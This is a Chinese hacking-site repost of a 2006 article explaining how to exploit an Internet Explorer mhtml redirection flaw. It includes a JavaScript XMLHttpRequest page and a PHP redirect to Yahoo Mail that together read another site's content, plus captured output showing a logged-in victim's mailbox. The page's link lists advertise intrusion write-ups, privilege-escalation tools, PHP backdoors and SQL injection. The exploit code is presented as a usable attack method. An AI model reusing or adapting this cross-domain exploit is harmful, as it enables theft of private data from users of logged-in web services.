·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]IE mhtml redirection漏洞利用方法

热荐 ★★★★

IE mhtml redirection漏洞利用方法

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2006-5-12 9:20:20

Author：yunshu_[At]_ph4nt0m.org
Team：http://www.ph4nt0m.org
Data: 2006-05-11

这个漏洞主要是信息泄露，参见http://secunia.com/advisories/19738/的具体描述。为了保证客户端安全，xmlhttp是无法跨域获取信息的。但是IE出现安全问题，在服务端通过mhtml重定向漏洞，可以利用xmlhttp跨域获取敏感信息。我测试是我登陆了Yahoo Mail之后，通过漏洞可以成功获取到邮件资料。漏洞报告说影响IE6.0，我使用IE7同样遭到攻击。

下面是主页面，通过xmlhttp请求本域的页面。（这里改成直接访问其他域会出现拒绝访问错误）

<html>
<head>
<script language="JavaScript">
// Start XML HTTP Request Object
var request = InitXMLHttpRequest();
function StartTest()
{
document.getElementById("result").innerHTML = "init ok<br />";
document.getElementById("result").innerHTML += "begain open<br /> ";
// Open/
request.open('GET', 'http://www.icylife.net/valu1.php', true);
document.getElementById("result").innerHTML += "begain send<br /> ";
request.onreadystatechange = WhenDone;
// Make the request
request.send();
}
// Function for Initialising the XMLHttpRequest
function InitXMLHttpRequest()
{
var request;
try
{
request = new XMLHttpRequest();
}
catch (trymicrosoft)
{
try
{
request = new ActiveXObject("Msxml2.XMLHTTP");
}
catch (othermicrosoft)
{
try
{
request = new ActiveXObject("Microsoft.XMLHTTP");
}
catch (failed)
{
request = false;
}
}
}
// Initialised?
if ( !request )
{
alert("Due to limitations of your browser you will not be able to use this page.");
}
else
{
return request;
}
}
function WhenDone( )
{
if ( request.readyState == 4 )
{
document.getElementById("result").innerHTML = request.responseText;
}
}
</script>
</head>
<body>
<b>Start the test:</b><br>
<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>
<br />
<div id="result"></div>
</body>
</html>

这里是第二个页面，利用mhtml重定向，代码很简单。再就是第三个，重定向到yahoo mail。

<?php
header("Location: http://mail.yahoo.com.cn/");
?>

我登陆了mail之后，攻击结果片段如下：

<html>
<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">
<title>
Yahoo!电邮 - wustyunshu@yahoo.com.cn</title>
<script type="text/javascript">

</script>
<noscript>
<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">
</noscript>

文章录入：cainiaowang 责任编辑：sygbox

上一篇文章： Php后门的隐藏技巧测试报告

下一篇文章： dvbbs7.1sp1最新漏洞的研究和利用

【字体：小大】

中介交易区

新云CMS Online.asp页面过滤不严	02-26
对网软网上购物系统的漏洞分析	01-09
测试SQL防注入脚本	12-21
Google Xss又出跨站新漏洞	11-06
一次简单的html injection导致的	11-06
风讯、科讯漏洞利用	11-01
Adobe pdf reader URI利用方式浅	10-23
超星阅览器的最新0DAY	10-19
运用SQL Injection做数据库渗透的	09-22
sa-blog 0day	09-22
HTML注入的一些简单想法	09-10
网站登陆接口的攻与防	09-04